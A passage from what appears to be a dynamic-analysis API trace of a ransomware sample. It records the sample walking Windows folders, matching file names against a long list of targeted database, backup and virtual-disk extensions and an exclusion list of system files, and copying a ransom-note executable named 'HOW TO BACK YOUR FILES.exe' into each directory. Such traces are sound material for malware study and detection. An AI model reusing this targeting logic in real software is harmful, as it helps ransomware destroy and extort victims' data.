(lpString="cpd") returned 3 [0039.660] lstrcmpiW (lpString1="ini", lpString2="cpd") returned 1 [0039.660] lstrlenW (lpString="dacpac") returned 6 [0039.660] lstrcmpiW (lpString1="op.ini", lpString2="dacpac") returned 1 [0039.660] lstrlenW (lpString="dad") returned 3 [0039.660] lstrcmpiW (lpString1="ini", lpString2="dad") returned 1 [0039.660] lstrlenW (lpString="dadiagrams") returned 10 [0039.660] lstrcmpiW (lpString1="esktop.ini", lpString2="dadiagrams") returned 1 [0039.660] lstrlenW (lpString="daschema") returned 8 [0039.660] lstrcmpiW (lpString1="ktop.ini", lpString2="daschema") returned 1 [0039.660] lstrlenW (lpString="db-journal") returned 10 [0039.660] lstrcmpiW (lpString1="esktop.ini", lpString2="db-journal") returned 1 [0039.660] lstrlenW (lpString="db-shm") returned 6 [0039.660] lstrcmpiW (lpString1="op.ini", lpString2="db-shm") returned 1 [0039.660] lstrlenW (lpString="db-wal") returned 6 [0039.660] lstrcmpiW (lpString1="op.ini", lpString2="db-wal") returned 1 [0039.661] lstrlenW (lpString="dbc") returned 3 [0039.661] lstrcmpiW (lpString1="ini", lpString2="dbc") returned 1 [0039.661] lstrlenW (lpString="dbs") returned 3 [0039.661] lstrcmpiW (lpString1="ini", lpString2="dbs") returned 1 [0039.661] lstrlenW (lpString="dbt") returned 3 [0039.661] lstrcmpiW (lpString1="ini", lpString2="dbt") returned 1 [0039.661] lstrlenW (lpString="dbv") returned 3 [0039.661] lstrcmpiW (lpString1="ini", lpString2="dbv") returned 1 [0039.661] lstrlenW (lpString="dbx") returned 3 [0039.661] lstrcmpiW (lpString1="ini", lpString2="dbx") returned 1 [0039.661] lstrlenW (lpString="dcb") returned 3 [0039.661] lstrcmpiW (lpString1="ini", lpString2="dcb") returned 1 [0039.661] lstrlenW (lpString="dct") returned 3 [0039.661] lstrcmpiW (lpString1="ini", lpString2="dct") returned 1 [0039.661] lstrlenW (lpString="dcx") returned 3 [0039.661] lstrcmpiW (lpString1="ini", lpString2="dcx") returned 1 [0039.661] lstrlenW (lpString="ddl") returned 3 [0039.661] lstrcmpiW (lpString1="ini", lpString2="ddl") returned 1 [0039.661] lstrlenW (lpString="dlis") returned 4 [0039.661] lstrcmpiW (lpString1=".ini", lpString2="dlis") returned -1 [0039.661] lstrlenW (lpString="dp1") returned 3 [0039.661] lstrcmpiW (lpString1="ini", lpString2="dp1") returned 1 [0039.661] lstrlenW (lpString="dqy") returned 3 [0039.661] lstrcmpiW (lpString1="ini", lpString2="dqy") returned 1 [0039.661] lstrlenW (lpString="dsk") returned 3 [0039.661] lstrcmpiW (lpString1="ini", lpString2="dsk") returned 1 [0039.661] lstrlenW (lpString="dsn") returned 3 [0039.661] lstrcmpiW (lpString1="ini", lpString2="dsn") returned 1 [0039.661] lstrlenW (lpString="dtsx") returned 4 [0039.661] lstrcmpiW (lpString1=".ini", lpString2="dtsx") returned -1 [0039.661] lstrlenW (lpString="dxl") returned 3 [0039.661] lstrcmpiW (lpString1="ini", lpString2="dxl") returned 1 [0039.661] lstrlenW (lpString="eco") returned 3 [0039.661] lstrcmpiW (lpString1="ini", lpString2="eco") returned 1 [0039.661] lstrlenW (lpString="ecx") returned 3 [0039.662] lstrcmpiW (lpString1="ini", lpString2="ecx") returned 1 [0039.662] lstrlenW (lpString="edb") returned 3 [0039.662] lstrcmpiW (lpString1="ini", lpString2="edb") returned 1 [0039.662] lstrlenW (lpString="epim") returned 4 [0039.662] lstrcmpiW (lpString1=".ini", lpString2="epim") returned -1 [0039.662] lstrlenW (lpString="fcd") returned 3 [0039.662] lstrcmpiW (lpString1="ini", lpString2="fcd") returned 1 [0039.662] lstrlenW (lpString="fdb") returned 3 [0039.662] lstrcmpiW (lpString1="ini", lpString2="fdb") returned 1 [0039.662] lstrlenW (lpString="fic") returned 3 [0039.662] lstrcmpiW (lpString1="ini", lpString2="fic") returned 1 [0039.662] lstrlenW (lpString="flexolibrary") returned 12 [0039.662] lstrlenW (lpString="fm5") returned 3 [0039.662] lstrcmpiW (lpString1="ini", lpString2="fm5") returned 1 [0039.662] lstrlenW (lpString="fmp") returned 3 [0039.662] lstrcmpiW (lpString1="ini", lpString2="fmp") returned 1 [0039.662] lstrlenW (lpString="fmp12") returned 5 [0039.662] lstrcmpiW (lpString1="p.ini", lpString2="fmp12") returned 1 [0039.662] lstrlenW (lpString="fmpsl") returned 5 [0039.662] lstrcmpiW (lpString1="p.ini", lpString2="fmpsl") returned 1 [0039.662] lstrlenW (lpString="fol") returned 3 [0039.662] lstrcmpiW (lpString1="ini", lpString2="fol") returned 1 [0039.662] lstrlenW (lpString="fp3") returned 3 [0039.662] lstrcmpiW (lpString1="ini", lpString2="fp3") returned 1 [0039.662] lstrlenW (lpString="fp4") returned 3 [0039.662] lstrcmpiW (lpString1="ini", lpString2="fp4") returned 1 [0039.662] lstrlenW (lpString="fp5") returned 3 [0039.662] lstrcmpiW (lpString1="ini", lpString2="fp5") returned 1 [0039.662] lstrlenW (lpString="fp7") returned 3 [0039.662] lstrcmpiW (lpString1="ini", lpString2="fp7") returned 1 [0039.662] lstrlenW (lpString="fpt") returned 3 [0039.662] lstrcmpiW (lpString1="ini", lpString2="fpt") returned 1 [0039.662] lstrlenW (lpString="frm") returned 3 [0039.662] lstrcmpiW (lpString1="ini", lpString2="frm") returned 1 [0039.662] lstrlenW (lpString="gdb") returned 3 [0039.662] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0039.663] lstrlenW (lpString="gdb") returned 3 [0039.663] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0039.663] lstrlenW (lpString="grdb") returned 4 [0039.663] lstrcmpiW (lpString1=".ini", lpString2="grdb") returned -1 [0039.663] lstrlenW (lpString="gwi") returned 3 [0039.663] lstrcmpiW (lpString1="ini", lpString2="gwi") returned 1 [0039.663] lstrlenW (lpString="hdb") returned 3 [0039.663] lstrcmpiW (lpString1="ini", lpString2="hdb") returned 1 [0039.663] lstrlenW (lpString="his") returned 3 [0039.663] lstrcmpiW (lpString1="ini", lpString2="his") returned 1 [0039.663] lstrlenW (lpString="ib") returned 2 [0039.663] lstrcmpiW (lpString1="ni", lpString2="ib") returned 1 [0039.663] lstrlenW (lpString="idb") returned 3 [0039.663] lstrcmpiW (lpString1="ini", lpString2="idb") returned 1 [0039.663] lstrlenW (lpString="ihx") returned 3 [0039.663] lstrcmpiW (lpString1="ini", lpString2="ihx") returned 1 [0039.663] lstrlenW (lpString="itdb") returned 4 [0039.663] lstrcmpiW (lpString1=".ini", lpString2="itdb") returned -1 [0039.663] lstrlenW (lpString="itw") returned 3 [0039.663] lstrcmpiW (lpString1="ini", lpString2="itw") returned -1 [0039.663] lstrlenW (lpString="jet") returned 3 [0039.663] lstrcmpiW (lpString1="ini", lpString2="jet") returned -1 [0039.663] lstrlenW (lpString="jtx") returned 3 [0039.663] lstrcmpiW (lpString1="ini", lpString2="jtx") returned -1 [0039.663] lstrlenW (lpString="kdb") returned 3 [0039.663] lstrcmpiW (lpString1="ini", lpString2="kdb") returned -1 [0039.663] lstrlenW (lpString="kexi") returned 4 [0039.663] lstrcmpiW (lpString1=".ini", lpString2="kexi") returned -1 [0039.663] lstrlenW (lpString="kexic") returned 5 [0039.663] lstrcmpiW (lpString1="p.ini", lpString2="kexic") returned 1 [0039.663] lstrlenW (lpString="kexis") returned 5 [0039.663] lstrcmpiW (lpString1="p.ini", lpString2="kexis") returned 1 [0039.663] lstrlenW (lpString="lgc") returned 3 [0039.663] lstrcmpiW (lpString1="ini", lpString2="lgc") returned -1 [0039.663] lstrlenW (lpString="lwx") returned 3 [0039.664] lstrcmpiW (lpString1="ini", lpString2="lwx") returned -1 [0039.664] lstrlenW (lpString="maf") returned 3 [0039.664] lstrcmpiW (lpString1="ini", lpString2="maf") returned -1 [0039.664] lstrlenW (lpString="maq") returned 3 [0039.664] lstrcmpiW (lpString1="ini", lpString2="maq") returned -1 [0039.664] lstrlenW (lpString="mar") returned 3 [0039.664] lstrcmpiW (lpString1="ini", lpString2="mar") returned -1 [0039.664] lstrlenW (lpString="marshal") returned 7 [0039.664] lstrcmpiW (lpString1="top.ini", lpString2="marshal") returned 1 [0039.664] lstrlenW (lpString="mas") returned 3 [0039.664] lstrcmpiW (lpString1="ini", lpString2="mas") returned -1 [0039.664] lstrlenW (lpString="mav") returned 3 [0039.664] lstrcmpiW (lpString1="ini", lpString2="mav") returned -1 [0039.664] lstrlenW (lpString="maw") returned 3 [0039.664] lstrcmpiW (lpString1="ini", lpString2="maw") returned -1 [0039.664] lstrlenW (lpString="mdbhtml") returned 7 [0039.664] lstrcmpiW (lpString1="top.ini", lpString2="mdbhtml") returned 1 [0039.664] lstrlenW (lpString="mdn") returned 3 [0039.664] lstrcmpiW (lpString1="ini", lpString2="mdn") returned -1 [0039.664] lstrlenW (lpString="mdt") returned 3 [0039.664] lstrcmpiW (lpString1="ini", lpString2="mdt") returned -1 [0039.664] lstrlenW (lpString="mfd") returned 3 [0039.664] lstrcmpiW (lpString1="ini", lpString2="mfd") returned -1 [0039.664] lstrlenW (lpString="mpd") returned 3 [0039.664] lstrcmpiW (lpString1="ini", lpString2="mpd") returned -1 [0039.664] lstrlenW (lpString="mrg") returned 3 [0039.664] lstrcmpiW (lpString1="ini", lpString2="mrg") returned -1 [0039.664] lstrlenW (lpString="mud") returned 3 [0039.664] lstrcmpiW (lpString1="ini", lpString2="mud") returned -1 [0039.664] lstrlenW (lpString="mwb") returned 3 [0039.664] lstrcmpiW (lpString1="ini", lpString2="mwb") returned -1 [0039.664] lstrlenW (lpString="myd") returned 3 [0039.664] lstrcmpiW (lpString1="ini", lpString2="myd") returned -1 [0039.664] lstrlenW (lpString="ndf") returned 3 [0039.664] lstrcmpiW (lpString1="ini", lpString2="ndf") returned -1 [0039.665] lstrlenW (lpString="nnt") returned 3 [0039.665] lstrcmpiW (lpString1="ini", lpString2="nnt") returned -1 [0039.665] lstrlenW (lpString="nrmlib") returned 6 [0039.665] lstrcmpiW (lpString1="op.ini", lpString2="nrmlib") returned 1 [0039.665] lstrlenW (lpString="ns2") returned 3 [0039.665] lstrcmpiW (lpString1="ini", lpString2="ns2") returned -1 [0039.665] lstrlenW (lpString="ns3") returned 3 [0039.665] lstrcmpiW (lpString1="ini", lpString2="ns3") returned -1 [0039.665] lstrlenW (lpString="ns4") returned 3 [0039.665] lstrcmpiW (lpString1="ini", lpString2="ns4") returned -1 [0039.665] lstrlenW (lpString="nsf") returned 3 [0039.665] lstrcmpiW (lpString1="ini", lpString2="nsf") returned -1 [0039.665] lstrlenW (lpString="nv") returned 2 [0039.665] lstrcmpiW (lpString1="ni", lpString2="nv") returned -1 [0039.665] lstrlenW (lpString="nv2") returned 3 [0039.665] lstrcmpiW (lpString1="ini", lpString2="nv2") returned -1 [0039.665] lstrlenW (lpString="nwdb") returned 4 [0039.665] lstrcmpiW (lpString1=".ini", lpString2="nwdb") returned -1 [0039.665] lstrlenW (lpString="nyf") returned 3 [0039.665] lstrcmpiW (lpString1="ini", lpString2="nyf") returned -1 [0039.665] lstrlenW (lpString="odb") returned 3 [0039.665] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0039.666] lstrlenW (lpString="odb") returned 3 [0039.666] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0039.666] lstrlenW (lpString="oqy") returned 3 [0039.666] lstrcmpiW (lpString1="ini", lpString2="oqy") returned -1 [0039.666] lstrlenW (lpString="ora") returned 3 [0039.666] lstrcmpiW (lpString1="ini", lpString2="ora") returned -1 [0039.666] lstrlenW (lpString="orx") returned 3 [0039.666] lstrcmpiW (lpString1="ini", lpString2="orx") returned -1 [0039.666] lstrlenW (lpString="owc") returned 3 [0039.666] lstrcmpiW (lpString1="ini", lpString2="owc") returned -1 [0039.666] lstrlenW (lpString="p96") returned 3 [0039.666] lstrcmpiW (lpString1="ini", lpString2="p96") returned -1 [0039.666] lstrlenW (lpString="p97") returned 3 [0039.666] lstrcmpiW (lpString1="ini", lpString2="p97") returned -1 [0039.666] lstrlenW (lpString="pan") returned 3 [0039.666] lstrcmpiW (lpString1="ini", lpString2="pan") returned -1 [0039.666] lstrlenW (lpString="pdb") returned 3 [0039.666] lstrcmpiW (lpString1="ini", lpString2="pdb") returned -1 [0039.666] lstrlenW (lpString="pdm") returned 3 [0039.666] lstrcmpiW (lpString1="ini", lpString2="pdm") returned -1 [0039.666] lstrlenW (lpString="pnz") returned 3 [0039.666] lstrcmpiW (lpString1="ini", lpString2="pnz") returned -1 [0039.666] lstrlenW (lpString="qry") returned 3 [0039.666] lstrcmpiW (lpString1="ini", lpString2="qry") returned -1 [0039.666] lstrlenW (lpString="qvd") returned 3 [0039.666] lstrcmpiW (lpString1="ini", lpString2="qvd") returned -1 [0039.666] lstrlenW (lpString="rbf") returned 3 [0039.666] lstrcmpiW (lpString1="ini", lpString2="rbf") returned -1 [0039.666] lstrlenW (lpString="rctd") returned 4 [0039.666] lstrcmpiW (lpString1=".ini", lpString2="rctd") returned -1 [0039.666] lstrlenW (lpString="rod") returned 3 [0039.666] lstrcmpiW (lpString1="ini", lpString2="rod") returned -1 [0039.666] lstrlenW (lpString="rodx") returned 4 [0039.666] lstrcmpiW (lpString1=".ini", lpString2="rodx") returned -1 [0039.666] lstrlenW (lpString="rpd") returned 3 [0039.667] lstrcmpiW (lpString1="ini", lpString2="rpd") returned -1 [0039.667] lstrlenW (lpString="rsd") returned 3 [0039.667] lstrcmpiW (lpString1="ini", lpString2="rsd") returned -1 [0039.667] lstrlenW (lpString="sas7bdat") returned 8 [0039.667] lstrcmpiW (lpString1="ktop.ini", lpString2="sas7bdat") returned -1 [0039.667] lstrlenW (lpString="sbf") returned 3 [0039.667] lstrcmpiW (lpString1="ini", lpString2="sbf") returned -1 [0039.667] lstrlenW (lpString="scx") returned 3 [0039.667] lstrcmpiW (lpString1="ini", lpString2="scx") returned -1 [0039.667] lstrlenW (lpString="sdb") returned 3 [0039.667] lstrcmpiW (lpString1="ini", lpString2="sdb") returned -1 [0039.667] lstrlenW (lpString="sdc") returned 3 [0039.667] lstrcmpiW (lpString1="ini", lpString2="sdc") returned -1 [0039.667] lstrlenW (lpString="sdf") returned 3 [0039.667] lstrcmpiW (lpString1="ini", lpString2="sdf") returned -1 [0039.667] lstrlenW (lpString="sis") returned 3 [0039.667] lstrcmpiW (lpString1="ini", lpString2="sis") returned -1 [0039.667] lstrlenW (lpString="spq") returned 3 [0039.667] lstrcmpiW (lpString1="ini", lpString2="spq") returned -1 [0039.667] lstrlenW (lpString="te") returned 2 [0039.667] lstrcmpiW (lpString1="ni", lpString2="te") returned -1 [0039.667] lstrlenW (lpString="teacher") returned 7 [0039.667] lstrcmpiW (lpString1="top.ini", lpString2="teacher") returned 1 [0039.667] lstrlenW (lpString="tmd") returned 3 [0039.667] lstrcmpiW (lpString1="ini", lpString2="tmd") returned -1 [0039.667] lstrlenW (lpString="tps") returned 3 [0039.667] lstrcmpiW (lpString1="ini", lpString2="tps") returned -1 [0039.667] lstrlenW (lpString="trc") returned 3 [0039.667] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0039.667] lstrlenW (lpString="trc") returned 3 [0039.667] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0039.667] lstrlenW (lpString="trm") returned 3 [0039.667] lstrcmpiW (lpString1="ini", lpString2="trm") returned -1 [0039.667] lstrlenW (lpString="udb") returned 3 [0039.667] lstrcmpiW (lpString1="ini", lpString2="udb") returned -1 [0039.668] lstrlenW (lpString="udl") returned 3 [0039.668] lstrcmpiW (lpString1="ini", lpString2="udl") returned -1 [0039.668] lstrlenW (lpString="usr") returned 3 [0039.668] lstrcmpiW (lpString1="ini", lpString2="usr") returned -1 [0039.668] lstrlenW (lpString="v12") returned 3 [0039.668] lstrcmpiW (lpString1="ini", lpString2="v12") returned -1 [0039.668] lstrlenW (lpString="vis") returned 3 [0039.668] lstrcmpiW (lpString1="ini", lpString2="vis") returned -1 [0039.668] lstrlenW (lpString="vpd") returned 3 [0039.668] lstrcmpiW (lpString1="ini", lpString2="vpd") returned -1 [0039.668] lstrlenW (lpString="vvv") returned 3 [0039.668] lstrcmpiW (lpString1="ini", lpString2="vvv") returned -1 [0039.668] lstrlenW (lpString="wdb") returned 3 [0039.668] lstrcmpiW (lpString1="ini", lpString2="wdb") returned -1 [0039.668] lstrlenW (lpString="wmdb") returned 4 [0039.668] lstrcmpiW (lpString1=".ini", lpString2="wmdb") returned -1 [0039.668] lstrlenW (lpString="wrk") returned 3 [0039.668] lstrcmpiW (lpString1="ini", lpString2="wrk") returned -1 [0039.668] lstrlenW (lpString="xdb") returned 3 [0039.668] lstrcmpiW (lpString1="ini", lpString2="xdb") returned -1 [0039.668] lstrlenW (lpString="xld") returned 3 [0039.668] lstrcmpiW (lpString1="ini", lpString2="xld") returned -1 [0039.668] lstrlenW (lpString="xmlff") returned 5 [0039.668] lstrcmpiW (lpString1="p.ini", lpString2="xmlff") returned -1 [0039.668] FindNextFileW (in: hFindFile=0x2cd128, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x494f7340, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x494f7340, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0039.668] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0039.668] FindNextFileW (in: hFindFile=0x2cd128, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x802f4656, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sample Videos", cAlternateFileName="SAMPLE~1")) returned 1 [0039.668] lstrcmpiW (lpString1="Sample Videos", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0039.668] lstrcmpiW (lpString1="Sample Videos", lpString2="aoldtz.exe") returned 1 [0039.668] lstrcmpiW (lpString1="Sample Videos", lpString2=".") returned 1 [0039.668] lstrcmpiW (lpString1="Sample Videos", lpString2="..") returned 1 [0039.668] lstrcmpiW (lpString1="Sample Videos", lpString2="windows") returned -1 [0039.668] lstrcmpiW (lpString1="Sample Videos", lpString2="bootmgr") returned 1 [0039.668] lstrcmpiW (lpString1="Sample Videos", lpString2="temp") returned -1 [0039.668] lstrcmpiW (lpString1="Sample Videos", lpString2="pagefile.sys") returned 1 [0039.669] lstrcmpiW (lpString1="Sample Videos", lpString2="boot") returned 1 [0039.669] lstrcmpiW (lpString1="Sample Videos", lpString2="ids.txt") returned 1 [0039.669] lstrcmpiW (lpString1="Sample Videos", lpString2="ntuser.dat") returned 1 [0039.669] lstrcmpiW (lpString1="Sample Videos", lpString2="perflogs") returned 1 [0039.669] lstrcmpiW (lpString1="Sample Videos", lpString2="MSBuild") returned 1 [0039.669] lstrlenW (lpString="Sample Videos") returned 13 [0039.669] lstrlenW (lpString="C:\\Users\\Public\\Videos\\desktop.ini") returned 34 [0039.669] lstrcpyW (in: lpString1=0x2e2e88e, lpString2="Sample Videos" | out: lpString1="Sample Videos") returned="Sample Videos" [0039.669] SetFileAttributesW (lpFileName="C:\\Users\\Public\\Videos\\Sample Videos", dwFileAttributes=0x10) returned 1 [0039.669] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2300 [0039.669] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x4a) returned 0x2ed7f0 [0039.669] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d2308 | out: ListHead=0x2e77d0, ListEntry=0x2d2308) returned 0x2d22e8 [0039.669] FindNextFileW (in: hFindFile=0x2cd128, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x802f4656, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sample Videos", cAlternateFileName="SAMPLE~1")) returned 0 [0039.669] FindClose (in: hFindFile=0x2cd128 | out: hFindFile=0x2cd128) returned 1 [0039.669] RtlInterlockedPopEntrySList (in: ListHead=0x2e77d0 | out: ListHead=0x2e77d0) returned 0x2d2308 [0039.669] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Public\\Videos\\Sample Videos", iMaxLength=260 | out: lpString1="C:\\Users\\Public\\Videos\\Sample Videos") returned="C:\\Users\\Public\\Videos\\Sample Videos" [0039.669] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ed7f0 | out: hHeap=0x2b0000) returned 1 [0039.669] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2300 | out: hHeap=0x2b0000) returned 1 [0039.669] lstrlenW (lpString="C:\\Users\\Public\\Videos\\Sample Videos") returned 36 [0039.669] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Public\\Videos\\Sample Videos" | out: lpString1="C:\\Users\\Public\\Videos\\Sample Videos") returned="C:\\Users\\Public\\Videos\\Sample Videos" [0039.669] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0039.669] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Public\\Videos\\Sample Videos\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\public\\videos\\sample videos\\how to back your files.exe"), bFailIfExists=1) returned 1 [0039.758] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0039.758] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Videos\\Sample Videos\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x49569760, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49569760, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccf68 [0039.758] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0039.758] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0039.758] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0039.758] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x49569760, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49569760, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.758] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0039.758] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0039.758] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0039.758] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0039.758] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x802f4656, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be12937, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x146, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0039.758] lstrcmpiW (lpString1="desktop.ini", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0039.758] lstrcmpiW (lpString1="desktop.ini", lpString2="aoldtz.exe") returned 1 [0039.758] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0039.758] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0039.759] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0039.759] lstrcmpiW (lpString1="desktop.ini", lpString2="bootmgr") returned 1 [0039.759] lstrcmpiW (lpString1="desktop.ini", lpString2="temp") returned -1 [0039.759] lstrcmpiW (lpString1="desktop.ini", lpString2="pagefile.sys") returned -1 [0039.759] lstrcmpiW (lpString1="desktop.ini", lpString2="boot") returned 1 [0039.759] lstrcmpiW (lpString1="desktop.ini", lpString2="ids.txt") returned -1 [0039.759] lstrcmpiW (lpString1="desktop.ini", lpString2="ntuser.dat") returned -1 [0039.759] lstrcmpiW (lpString1="desktop.ini", lpString2="perflogs") returned -1 [0039.759] lstrcmpiW (lpString1="desktop.ini", lpString2="MSBuild") returned -1 [0039.759] lstrlenW (lpString="desktop.ini") returned 11 [0039.759] lstrlenW (lpString="C:\\Users\\Public\\Videos\\Sample Videos\\*") returned 38 [0039.759] lstrcpyW (in: lpString1=0x2e2e8aa, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0039.759] lstrlenW (lpString="desktop.ini") returned 11 [0039.759] lstrlenW (lpString="Ares865") returned 7 [0039.759] lstrcmpiW (lpString1="top.ini", lpString2="Ares865") returned 1 [0039.759] lstrlenW (lpString=".dll") returned 4 [0039.759] lstrcmpiW (lpString1="desktop.ini", lpString2=".dll") returned 1 [0039.759] lstrlenW (lpString=".lnk") returned 4 [0039.759] lstrcmpiW (lpString1="desktop.ini", lpString2=".lnk") returned 1 [0039.759] lstrlenW (lpString=".ini") returned 4 [0039.759] lstrcmpiW (lpString1="desktop.ini", lpString2=".ini") returned 1 [0039.759] lstrlenW (lpString=".sys") returned 4 [0039.759] lstrcmpiW (lpString1="desktop.ini", lpString2=".sys") returned 1 [0039.759] lstrlenW (lpString="desktop.ini") returned 11 [0039.759] lstrlenW (lpString="bak") returned 3 [0039.759] lstrcmpiW (lpString1="ini", lpString2="bak") returned 1 [0039.759] lstrlenW (lpString="ba_") returned 3 [0039.759] lstrcmpiW (lpString1="ini", lpString2="ba_") returned 1 [0039.759] lstrlenW (lpString="dbb") returned 3 [0039.759] lstrcmpiW (lpString1="ini", lpString2="dbb") returned 1 [0039.759] lstrlenW (lpString="vmdk") returned 4 [0039.759] lstrcmpiW (lpString1=".ini", lpString2="vmdk") returned -1 [0039.760] lstrlenW (lpString="rar") returned 3 [0039.760] lstrcmpiW (lpString1="ini", lpString2="rar") returned -1 [0039.760] lstrlenW (lpString="zip") returned 3 [0039.760] lstrcmpiW (lpString1="ini", lpString2="zip") returned -1 [0039.760] lstrlenW (lpString="tgz") returned 3 [0039.760] lstrcmpiW (lpString1="ini", lpString2="tgz") returned -1 [0039.760] lstrlenW (lpString="vbox") returned 4 [0039.760] lstrcmpiW (lpString1=".ini", lpString2="vbox") returned -1 [0039.760] lstrlenW (lpString="vdi") returned 3 [0039.760] lstrcmpiW (lpString1="ini", lpString2="vdi") returned -1 [0039.760] lstrlenW (lpString="vhd") returned 3 [0039.760] lstrcmpiW (lpString1="ini", lpString2="vhd") returned -1 [0039.760] lstrlenW (lpString="vhdx") returned 4 [0039.760] lstrcmpiW (lpString1=".ini", lpString2="vhdx") returned -1 [0039.760] lstrlenW (lpString="avhd") returned 4 [0039.760] lstrcmpiW (lpString1=".ini", lpString2="avhd") returned -1 [0039.760] lstrlenW (lpString="db") returned 2 [0039.760] lstrcmpiW (lpString1="ni", lpString2="db") returned 1 [0039.760] lstrlenW (lpString="db2") returned 3 [0039.760] lstrcmpiW (lpString1="ini", lpString2="db2") returned 1 [0039.760] lstrlenW (lpString="db3") returned 3 [0039.760] lstrcmpiW (lpString1="ini", lpString2="db3") returned 1 [0039.760] lstrlenW (lpString="dbf") returned 3 [0039.760] lstrcmpiW (lpString1="ini", lpString2="dbf") returned 1 [0039.760] lstrlenW (lpString="mdf") returned 3 [0039.760] lstrcmpiW (lpString1="ini", lpString2="mdf") returned -1 [0039.760] lstrlenW (lpString="mdb") returned 3 [0039.760] lstrcmpiW (lpString1="ini", lpString2="mdb") returned -1 [0039.760] lstrlenW (lpString="sql") returned 3 [0039.760] lstrcmpiW (lpString1="ini", 